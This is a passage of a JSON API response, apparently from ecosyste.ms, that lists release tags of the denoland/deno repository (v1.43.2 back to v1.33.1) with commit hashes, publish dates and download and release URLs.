cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/deno